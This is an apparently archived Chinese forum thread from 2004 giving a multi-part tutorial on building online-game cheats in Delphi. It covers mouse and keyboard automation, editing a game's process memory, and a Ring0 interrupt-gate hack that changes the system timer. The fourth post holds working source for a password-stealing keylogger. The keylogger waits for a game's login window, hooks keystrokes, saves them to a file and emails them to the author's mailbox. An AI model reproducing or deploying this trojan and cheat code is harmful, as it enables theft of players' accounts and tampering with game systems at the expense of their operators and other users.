史萊姆論壇

返回   史萊姆論壇 > 教學文件資料庫 > 網路軟硬體架設技術文件
忘記密碼?
註冊帳號 論壇說明 標記討論區已讀

歡迎您來到『史萊姆論壇』 ^___^

您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的!

請點擊這裡:『註冊成為我們的一份子!』

Google 提供的廣告


 
 
主題工具 顯示模式
舊 2004-10-16, 08:55 AM   #1
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設 網路遊戲外掛製作之我所見

本技術文件和開發工具均來自Internet,僅交流學習技術使用,請在觀看24小時之後,自行忘記內容,如果您喜歡本貼,請支持正版遊戲盜版外掛,或請回覆頂之,謝謝。


==================================================
網路遊戲外掛製作之我所見(1)


在幾年前我看到別人玩網路遊戲用上了外掛,做為程序員的我心裡實在是不爽,想搞清楚這到底是怎麼回事。就拿了一些來研究,小有心得,拿出來與大家共享,外掛無非就是分幾種罷了(依製作難度):

1、動作式,所謂動作式,就是指用API發指令給視窗或API控制滑鼠、鍵盤等,使遊戲裡的人物進行流動或者攻擊,最早以前的「石器」外掛就是這種方式。


(這種外掛完全是垃圾,TMD,只要會一點點API的人都知道該怎麼做,不過這種外掛也是入門級的好東東,雖然不能提高你的戰鬥力,但是可以提高你的士氣^_^)


2、本機修改式,這種外掛跟傳統上的一些遊戲修改器沒有兩樣,做這種外掛在編程只需要對記憶體位址有一點認識並且掌握API就可以實現,「精靈」的外掛這是這種方式寫成的,它的難點在於找到那些位址碼,找位址一般地要借助於別人的工具,有的遊戲還有雙碼校驗,正正找起來會比較困難。

(這種外掛,比上一種有一點點難度,但是這種外掛做起來能夠用,也是有一定難度的啦~~,這種外掛可以很快提升你對記憶體位址的理解及套用,是你編程技術提高的好東東)



3、木馬式,這種外掛的目的是幫外掛製作者偷到用戶的密碼(TMD,「爛」就一個字,不過要知已知彼所以還是要談一下啦~~),做這種外掛有一定的難度,需要HOOK或鍵盤監視技術做底子,才可以完成,它的原理是先首截了用戶的帳號或密碼,然後發到指定郵信箱。

(我以前寫過這樣的東東,但是從來沒有用過,我知道這種東東很不道德,所以以後千萬別用呀!~~)

4、加速式,這種外掛可以加快遊戲的速度……(對不起大家,這種東東我沒有實際做過,所以不能妄自評,慚愧~~)


5、封包式,這種外掛是高難度外掛,需要有很強的編程功力才可以寫得出來。它的原理是先截取封包,後修改,再轉發(Kao,說起來簡單,你做一個試試~~~~)。


這種外掛適用於大多數網路遊戲,像WPE及一些網路遊戲外掛都是用這種方式寫成的,編寫這種外掛需要apihook技術,winsock技術…………


  這幾種外掛之中,前三種可以用VB,DELPHI等語言比較好實現,後兩種則要用VC等底層支持比較好的編程工具才好實現。(啪,請聽下回分解)
(本人是個程序愛好者並不是專業製作外掛的,所以文中有什麼不當請大家海涵,以後的文章,我會依對動作式,本機修改式,木馬式,封包式這4種東東的編寫程序做詳細解說)
psac 目前離線  
送花文章: 3, 收花文章: 1625 篇, 收花: 3196 次
舊 2004-10-16, 08:57 AM   #2 (permalink)
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設

網路遊戲外掛製作之我所見(2)

上回對五種檔案類型的外掛做了一個大體的概括,大家對這幾種外掛都有了一定的瞭解,現在就依次(製作難度)由淺到深談談我對外掛製作的一些認識吧~~~~

首先,先來談一下動作式的外掛,這也是我第一次寫外掛時做的最簡單的一種。


記得還在「石器」時代的時候,我看到別人掛著一種軟體(外掛)人物就可以四外遊走(當時我還不知道外掛怎麼回事^_^),於是找了這種軟體過來研究(拿來後才聽別人說這叫外掛),發現這種東東其實實現起來並不難,仔佃看其實人物的行走無非就是滑鼠在不同的地方點來點去而已,看後就有實現這功能的衝動,隨後跑到MSDN上看了一些資料,發現這種實現這幾個功能,只需要幾個簡單的API函數就可以搞定:



1、首先我們要知道現在滑鼠的位置(為了好還原現在滑鼠的位置)所以我們就要用到API函數GetCursorPos,它的使用方法如下:
BOOL GetCursorPos(

LPPOINT lpPoint // address of structure for cursor position
);
2、我們把滑鼠的位置移到要到人物走到的地方,我們就要用到SetCursorPos函數來移動滑鼠位置,它的使用方法如下:
BOOL SetCursorPos(

int X, // horizontal position
int Y // vertical position
);
3、模擬滑鼠發出按下和放開的動作,我們要用到mouse_event函數來實現,具休使用方法用下:
VOID mouse_event(

DWORD dwFlags, // flags specifying various motion/click variants
DWORD dx, // horizontal mouse position or position change
DWORD dy, // vertical mouse position or position change
DWORD dwData, // amount of wheel movement
DWORD dwExtraInfo // 32 bits of application-defined information
);
在它的dwFlags處,可用的事件很多如移動MOUSEEVENTF_MOVE,左鍵按下MOUSEEVENTF_LEFTDOWN,左鍵放開MOUSEEVENTF_LEFTUP,具體的東東還是查一下MSDN吧~~~~~
好了,有了以前的知識,我們就可以來看看人物移走是怎麼實現的了:

getcursorpos(point);
setcursorpos(ranpoint(80,windowX),ranpoint(80,windowY));//ranpoint是個自製的隨機坐標函數
mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);
mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);
setcursorpos(point.x,point.y);

看了以上的程式碼,是不是覺得人物的遊走很簡單啦~~,舉一仿三,還有好多好東東可以用這個技巧實現(我早就說過,TMD,這是垃圾外掛的做法,相信了吧~~~),接下來,再看看遊戲裡面自動攻擊的做法吧(必需遊戲中攻擊支持快捷鍵的),道理還是一樣的,只是用的API不同罷了~~~,這回我們要用到的是keybd_event函數,其用法如下:
VOID keybd_event(

BYTE bVk, // virtual-key code
BYTE bScan, // hardware scan code
DWORD dwFlags, // flags specifying various function options
DWORD dwExtraInfo // additional data associated with keystroke
);
我們還要知道掃瞄碼不可以直接使用,要用函數MapVirtualKey把鍵值轉成掃瞄碼,MapVirtualKey的具體使用方法如下:


UINT MapVirtualKey(

UINT uCode, // virtual-key code or scan code
UINT uMapType // translation to perform
);
好了,比說此快接鍵是CTRL+A,接下來讓我們看看實際程式碼是怎麼寫的:

keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),0,0);
keybd_event(65,mapvirtualkey(65,0),0,0);
keybd_event(65,mapvirtualkey(65,0),keyeventf_keyup,0);
keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),keyeventf_keyup,0);

首先模擬按下了CTRL鍵,再模擬按下A鍵,再模擬放開A鍵,最後放來CTRL鍵,這就是一個模擬按快捷鍵的週期。


(看到這裡,差不多對簡易外掛有了一定的瞭解了吧~~~~做一個試試?如果你舉一仿三還能有更好的東東出來,這就要看你的領悟能力了~~,不過不要高興太早這只是才開始,以後還有更複雜的東東等著你呢~~)
psac 目前離線  
送花文章: 3, 收花文章: 1625 篇, 收花: 3196 次
向 psac 送花的會員:
25077667 (2014-04-04)
感謝您發表一篇好文章
舊 2004-10-16, 08:58 AM   #3 (permalink)
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設

網路遊戲外掛製作之我所見(3)


上回我們對動作式外掛做了一個解析,動作式是最簡單的外掛,現在我們帶來看看,比動作式外掛更進一步的外掛——本地機修改式外掛的整個製作程序進行一個詳細的分解。


具我所知,本地機修改式外掛最典型的套用就是在「精靈」遊戲上面,因為我在近一年前(「精靈」還在測試階段),我所在的公司裡有很多同事玩「精靈」,於是我看了一下遊戲的資料處理方式,發現它所傳送到服務器上的訊息是存在於記憶體當中(我看後第一個感受是:
修改這種遊戲和修改單機版的遊戲沒有多大分別,換句話說就是在他向服務器提交訊息之前修改了記憶體位址就可以了),當時我找到了位址於是修改了記憶體位址,果然,按我的想法修改了位址,讓系統自動提交後,果然成功了~~~~~,後來「精靈」又改成了雙位址校檢,記憶體校檢等等,在這裡我就不廢話了~~~~,OK,我們就來看看這類外掛是如何製作的:


在做外掛之前我們要對Windows的記憶體有個具體的認識,而在這裡我們所指的記憶體是指系統的記憶體偏移量,也就是相對記憶體,而我們所要對其進行修改,那麼我們要對幾個Windows API進行瞭解,OK,跟著例子讓我們看清楚這種外掛的製作和API的套用(為了保證網路遊戲的正常執行,我就不把找記憶體位址的方法詳細解說了):


1、首先我們要用FindWindow,知道遊戲視窗的關鍵句,因為我們要通過它來得知遊戲的執行後所在工作的ID,下面就是FindWindow的用法:
HWND FindWindow(

LPCTSTR lpClassName, // pointer to class name
LPCTSTR lpWindowName // pointer to window name
);
2、我們GetWindowThreadProcessId來得到遊戲視窗相對應工作的工作ID,函數用法如下:
DWORD GetWindowThreadProcessId(

HWND hWnd, // handle of window
LPDWORD lpdwProcessId // address of variable for process identifier
);
3、得到遊戲工作ID後,接下來的事是要以最高權限開啟工作,所用到的函數OpenProcess的具體使用方法如下:
HANDLE OpenProcess(

DWORD dwDesiredAccess, // access flag
BOOL bInheritHandle, // handle inheritance flag
DWORD dwProcessId // process identifier
);
在dwDesiredAccess之處就是設存取方式的地方,它可設的權限很多,我們在這裡使用只要使用PROCESS_ALL_ACCESS 來開啟工作就可以,其他的方式我們可以查一下MSDN。


4、開啟工作後,我們就可以用函數對存內進行操作,在這裡我們只要用到WriteProcessMemory來對記憶體位址寫入資料即可(其他的操作方式比如說:ReadProcessMemory等,我在這裡就不一一介紹了),我們看一下WriteProcessMemory的用法:
BOOL WriteProcessMemory(

HANDLE hProcess, // handle to process whose memory is written to
LPVOID lpBaseAddress, // address to start writing to
LPVOID lpBuffer, // pointer to buffer to write data to
DWORD nSize, // number of bytes to write
LPDWORD lpNumberOfBytesWritten // actual number of bytes written
);
5、下面用CloseHandle關閉工作關鍵句就完成了。
這就是這類遊戲外掛的程序實現部份的方法,好了,有了此方法,我們就有了理性的認識,我們看看實際例子,提升一下我們的感性認識吧,下面就是XX遊戲的外掛程式碼,我們照上面的方法對應去研究一下吧:



const
ResourceOffset: dword = $004219F4;
resource: dword = 3113226621;
ResourceOffset1: dword = $004219F8;
resource1: dword = 1940000000;
ResourceOffset2: dword = $0043FA50;
resource2: dword = 1280185;
ResourceOffset3: dword = $0043FA54;
resource3: dword = 3163064576;
ResourceOffset4: dword = $0043FA58;
resource4: dword = 2298478592;
var
hw: HWND;
pid: dword;
h: THandle;
tt: Cardinal;
begin
hw := FindWindow('XX', nil);
if hw = 0 then
Exit;
GetWindowThreadProcessId(hw, @pid);
h := OpenProcess(PROCESS_ALL_ACCESS, false, pid);
if h = 0 then
Exit;
if flatcheckbox1.Checked=true then
begin
WriteProcessMemory(h, Pointer(ResourceOffset), @Resource, sizeof(Resource), tt);
WriteProcessMemory(h, Pointer(ResourceOffset1), @Resource1, sizeof(Resource1), tt);
end;
if flatcheckbox2.Checked=true then
begin
WriteProcessMemory(h, Pointer(ResourceOffset2), @Resource2, sizeof(Resource2), tt);
WriteProcessMemory(h, Pointer(ResourceOffset3), @Resource3, sizeof(Resource3), tt);
WriteProcessMemory(h, Pointer(ResourceOffset4), @Resource4, sizeof(Resource4), tt);
end;
MessageBeep(0);
CloseHandle(h);
close;
這個遊戲是用了多位址對所要提交的資料進行了校驗,所以說這類遊戲外掛製作並不是很難,最難的是要找到這些位址。


(方法大家已經看清楚了,具體實踐就看大家的了,呵呵~~~~~~,不過不要高興太早,這種網路遊戲畢竟佔少數,所以我會在以後的文章中對其他檔案檔案類型外掛做詳細解說,對了,請跟一下帖子,鼓勵一下,不然我真的沒有信心寫下面的文章了,謝謝)
psac 目前離線  
送花文章: 3, 收花文章: 1625 篇, 收花: 3196 次
舊 2004-10-16, 09:00 AM   #4 (permalink)
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設

網路遊戲外掛製作之我所見(4)


以前介紹過的動作式,本機修改式外掛是真正意義上的外掛,而今天本文要介紹的木馬式外掛,可能大多像木馬吧,是說明 做外掛的人偷取別人遊戲的帳號及密碼的東東。因為網路上有此類外掛的存在,所以今天不得不說一下(我個人是非常討厭這類外掛的,請看過本文的朋友不要到處亂用此技術,謝謝合作)。

要做此類外掛的程序實現方法很多(比如HOOK,鍵盤監視等技術),因為HOOK技術對程序員的技術要求比較高並且在實際套用上需要多帶一個動態連接庫,所以在文中我會以鍵盤監視技術來實現此類木馬的製作。


鍵盤監視技術只需要一個.exe文件就能實現做到後台鍵盤監視,這個程序用這種技術來實現比較適合。


在做程序之前我們必需要瞭解一下程序的思法:

1、我們首先知道你想記錄遊戲的登入視窗名稱。

2、判斷登入視窗是否出現。

3、如果登入視窗出現,就記錄鍵盤。

4、當視窗關閉時,把記錄訊息,通過郵件傳送到程序設計者的郵信箱。


第一點我就不具體分析了,因為你們比我還要瞭解你們玩的是什麼遊戲,登入視窗名稱是什麼。從第二點開始,我們就開始這類外掛的程序實現之旅:

那麼我們要怎麼樣判斷登入視窗雖否出現呢?其實這個很簡單,我們用FindWindow函數就可以很輕鬆的實現了:


HWND FindWindow(

LPCTSTR lpClassName, // pointer to class name
LPCTSTR lpWindowName // pointer to window name
);

實際程序實現中,我們要找到'xx'視窗,就用FindWindow(nil,'xx')如果當返回值大於0時表示視窗已經出現,那麼我們就可以對鍵盤訊息進行記錄了。

先首我們用SetWindowsHookEx設定監視日誌,而該函數的用法如下:


HHOOK SetWindowsHookEx(

int idHook, // type of hook to install
HOOKPROC lpfn, // address of hook procedure
HINSTANCE hMod, // handle of application instance
DWORD dwThreadId // identity of thread to install hook for
);
在這裡要說明的是在我們程序當中我們要對HOOKPROC這裡我們要通過寫一個函數,來實現而HINSTANCE這裡我們直接用本程序的HINSTANCE就可以了,具體實現方法為:


hHook := SetWindowsHookEx(WH_JOURNALRECORD, HookProc, HInstance, 0);
而HOOKPROC裡的函數就要複雜一點點:

function HookProc(iCode: integer; wParam: wParam; lParam: lParam): LResult; stdcall;
begin
if findedtitle then //如果發現視窗後
begin
if (peventmsg(lparam)^.message = WM_KEYDOWN) then //消息等於鍵盤按下
hookkey := hookkey + Form1.Keyhookresult(peventMsg(lparam)^.paramL, peventmsg(lparam)^.paramH); //通過keyhookresult(自訂的函數,主要功能是轉換截獲的消息參數為按鍵名稱。


我會在文章尾附上轉化函數的)轉換消息。


if length(hookkey) > 0 then //如果獲得按鍵名稱
begin
Write(hookkeyFile,hookkey); //把按鍵名稱寫入文本文件
hookkey := ''
end;
end;
end;


以上就是記錄鍵盤的整個程序,簡單吧,如果記錄完可不要忘記釋放呀,UnHookWindowsHookEx(hHook),而hHOOK,就是新增setwindowshookex後所返回的關鍵句。



我們已經得到了鍵盤的記錄,那麼現在最後只要把記錄的這些訊息傳送回來,我們就大功造成了。

其他傳送這塊並不是很難,只要把記錄從文本文件裡邊讀出來,用DELPHI原有的的電子郵件元件發一下就萬事OK了。

程式碼如下:

assignfile(ReadFile,'hook.txt'); //開啟hook.txt這個文本文件
reset(ReadFile); //設為讀取方式
try
While not Eof(ReadFile) do //當沒有讀到文件尾
begin
Readln(ReadFile,s,j); //讀取文件行
body:=body+s;
end;
finally
closefile(ReadFile); //關閉文件
end;
nmsmtp1.EncodeType:=uuMime; //設定編碼
nmsmtp1.PostMessage.Attachments.Text:='' //設定附件
nmsmtp1.PostMessage.FromAddress:=&#39XXX@XXX.com' //設定源郵件位址
nmsmtp1.PostMessage.ToAddress.Text:=&#39XXX@XXX.com' /設定目標郵件位址
nmsmtp1.PostMessage.Body.Text:='密碼'+' '+body; //設定郵件內容
nmsmtp1.PostMessage.Subject:='password' //設定郵件標題
nmsmtp1.SendMail; //傳送郵件


這個程序全部功能已經實現,編編試試~~~對了,我以前寫的類似的作品可以在http://www.playicq.com/上找得到。


(其實做一個這樣的東東也不難,基本也是說不上什麼技術可言。希望大看我的文章後不要到處亂套用呀~~~~小生在此有禮了~~~,最後要說的是我最近一段時間很忙,服務機構裡有一堆事情等著我要去做(做項目,做研發,帶實習生,過CMM2~~~~累呀),所以第5篇也不得不推後出了,請大家諒解,做為對大家關心的補償,請大家有什麼問題隨後貼帖留言,如果我會,我會一一解答的,謝謝大家對我的文章的關心~~)



附:
function Keyhookresult(lP: integer; wP: integer): pchar;
begin
result := '[Print Screen]'
case lp of
10688: result := '`'
561: Result := Ƈ'
818: result := ƈ'
1075: result := Ɖ'
1332: result := Ɗ'
1589: result := Ƌ'
1846: result := ƌ'
2103: result := ƍ'
2360: result := Ǝ'
2617: result := Ə'
2864: result := Ɔ'
3261: result := '-'
3515: result := '='
4177: result := 'Q'
4439: result := 'W'
4677: result := 'E'
4946: result := 'R'
5204: result := 'T'
5465: result := 'Y'
5717: result := 'U'
5961: result := 'I'
6223: result := 'O'
6480: result := 'P'
6875: result := '['
7133: result := ']'
11228: result := '\'
7745: result := 'A'
8019: result := 'S'
8260: result := 'D'
8518: result := 'F'
8775: result := 'G'
9032: result := 'H'
9290: result := 'J'
9547: result := 'K'
9804: result := 'L'
10170: result := ''
10462: result := ''''
11354: result := 'Z'
11608: result := 'X'
11843: result := 'C'
12118: result := 'V'
12354: result := 'B'
12622: result := 'N'
12877: result := 'M'
13244: result := ','
13502: result := '.'
13759: result := '/'
13840: result := '[Right-Shift]'
14624: result := '[Space]'
283: result := '[Esc]'
15216: result := '[F1]'
15473: result := '[F2]'
15730: result := '[F3]'
15987: result := '[F4]'
16244: result := '[F5]'
16501: result := '[F6]'
16758: result := '[F7]'
17015: result := '[F8]'
17272: result := '[F9]'
17529: result := '[F10]'
22394: result := '[F11]'
22651: result := '[F12]'
10768: Result := '[Left-Shift]'
14868: result := '[CapsLock]'
3592: result := '[Backspace]'
3849: result := '[Tab]'
7441:
if wp > 30000 then
result := '[Right-Ctrl]'
else
result := '[Left-Ctrl]'
13679: result := '[Num /]'
17808: result := '[NumLock]'
300: result := '[Print Screen]'
18065: result := '[Scroll Lock]'
17683: result := '[Pause]'
21088: result := '[Num0]'
21358: result := '[Num.]'
20321: result := '[Num1]'
20578: result := '[Num2]'
20835: result := '[Num3]'
19300: result := '[Num4]'
19557: result := '[Num5]'
19814: result := '[Num6]'
18279: result := '[Num7]'
18536: result := '[Num8]'
18793: result := '[Num9]'
19468: result := '[*5*]'
14186: result := '[Num *]'
19053: result := '[Num -]'
20075: result := '[Num +]'
21037: result := '[Insert]'
21294: result := '[Delete]'
18212: result := '[Home]'
20259: result := '[End]'
18721: result := '[PageUp]'
20770: result := '[PageDown]'
18470: result := '[UP]'
20520: result := '[DOWN]'
19237: result := '[left]'
19751: result := '[right]'
7181: result := '[Enter]'
end;
end;
psac 目前離線  
送花文章: 3, 收花文章: 1625 篇, 收花: 3196 次
舊 2004-10-16, 09:01 AM   #5 (permalink)
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設

網路遊戲外掛製作之我所見(5)


我一直沒有搞懂製作加速外掛是怎麼一回事,直到前不久又翻出來了2001年下半期的《程序員合訂本》中《「變速齒輪」研究手記》重新回味了一遍,才有了一點點開悟,隨後用Delphi重寫了一遍,下面我就把我的心得說給大家聽聽,並且在此感謝《「變速齒輪」研究手記》作者褚瑞大虲給了提示。廢話我就不多說了,那就開始神奇的加速型外掛體驗之旅吧!


原本我一直以為加速外掛是針對某個遊戲而寫的,後來發現我這種概念是不對的,所謂加速外掛其實是修改時鐘頻率達到加速的目的。



以前DOS時代玩過編程的人就會馬上想到,這很簡單嘛不就是直接修改一下8253暫存器嘛,這在以前DOS時代可能可以行得通,但是windows則不然。windows是一個32位的操作系統,並不是你想改哪就改哪的(微軟的東東就是如此霸氣,說不給你改就不給你改^_^),但要改也不是不可能,我們可以通過兩種方法來實現:


第一是寫一個硬體驅動來完成,第二是用Ring0來實現(這種方法是CIH的作者陳盈豪首用的,它的原理是修改一下IDE表->新增一個中斷門->進入Ring0->使用中斷修改向量,但是沒有辦法只能用ASM彙編來實現這一切*_*,做為進階語言使用者慘啦!),用第一種方法用點麻煩,所以我們在這裡就用第二種方法實現吧~~~
在實現之前我們來理一下思法吧:


1、我們首先要寫一個程序在這個程序裡嵌入彙編語言來實現修改IDE表、新增中斷門,修改向量等工作

2、使用這個程序來實現加速功能
好了,現在思法有了,我們就邊看程式碼邊講解吧:


首先我們建立一個程序,這個程序就是本程序的核心部份:


procedure SetRing(value:word); stdcall;
const ZDH = $03; 設一個中斷號
var
IDT : array [0..5] of byte; 儲存IDT表
OG : dword; 存放舊向量
begin
asm
push ebx
sidt IDT 讀入中斷描述符表
mov ebx, dword ptr [IDT+2] IDT表基位址
add ebx, 8*ZDH 計算中斷在中斷描述符表中的位置
cli 關中斷
mov dx, word ptr [ebx+6]
shl edx, 16d
mov dx, word ptr [ebx]
mov [OG], edx
mov eax, offset @@Ring0 指向Ring0級程式碼段
mov word ptr [ebx], ax 低16位,儲存在1,2位
shr eax, 16d
mov word ptr [ebx+6], ax 高16位,儲存在6,7位
int ZDH 中斷
mov ebx, dword ptr [IDT+2] 重新定位
add ebx, 8*ZDH
mov edx, [OG]
mov word ptr [ebx], dx
shr edx, 16d
mov word ptr [ebx+6], dx 恢復被改了的向量
pop ebx
jmp @@exitasm 到exitasm處
@@Ring0: Ring0,這個也是最最最核心的東東
mov al,$34 寫入8253控制暫存器
out $43,al
mov ax,value 寫入定時值
out $40,al 寫定時值低位元
mov al,ah
out $40,al 寫定時值高位
iretd 返回
@@exitasm:
end;
end;


最核心的東西已經寫完了,大部份讀者是知其然不知其所以然吧,呵呵,不過不知其所以然也然。下面我們就試著用一下這個程序來做一個類似於「變速齒輪」的一個東東吧!


先加一個視窗,在視窗上放上一個trackbar控件把其Max設為20,Min設為1,把Position設為10,在這個控件的Change事件裡寫上:

SetRing(strtoint('$'+inttostr(1742+(10-trackbar1.Position)*160)));

因為windows預設的值為$1742,所以我們把1742做為基數,又因為值越小越快,反之越慢的原理,所以寫了這樣一個公式,好了,這就是「變速齒輪」的一個Delphi+ASM版了(只適用於win9X),呵呵,試一下吧,這對你說明 會很大的,呵呵。
psac 目前離線  
送花文章: 3, 收花文章: 1625 篇, 收花: 3196 次
舊 2005-09-03, 09:49 AM   #6 (permalink)
註冊會員
榮譽勳章
UID - 79625
在線等級: 級別:13 | 在線時長:235小時 | 升級還需:17小時級別:13 | 在線時長:235小時 | 升級還需:17小時級別:13 | 在線時長:235小時 | 升級還需:17小時
註冊日期: 2003-06-21
VIP期限: 2009-10
文章: 60
精華: 0
現金: 5588 金幣
資產: 10588 金幣
預設

嗯嗯~~~~
小弟受教了
cocoking 目前離線  
送花文章: 74, 收花文章: 1 篇, 收花: 1 次
 


主題工具
顯示模式

發表規則
不可以發文
不可以回覆主題
不可以上傳附加檔案
不可以編輯您的文章

論壇啟用 BB 語法
論壇啟用 表情符號
論壇啟用 [IMG] 語法
論壇禁用 HTML 語法
Trackbacks are 禁用
Pingbacks are 禁用
Refbacks are 禁用


所有時間均為台北時間。現在的時間是 07:04 PM


Powered by vBulletin® 版本 3.6.8
版權所有 ©2000 - 2019, Jelsoft Enterprises Ltd.


SEO by vBSEO 3.6.1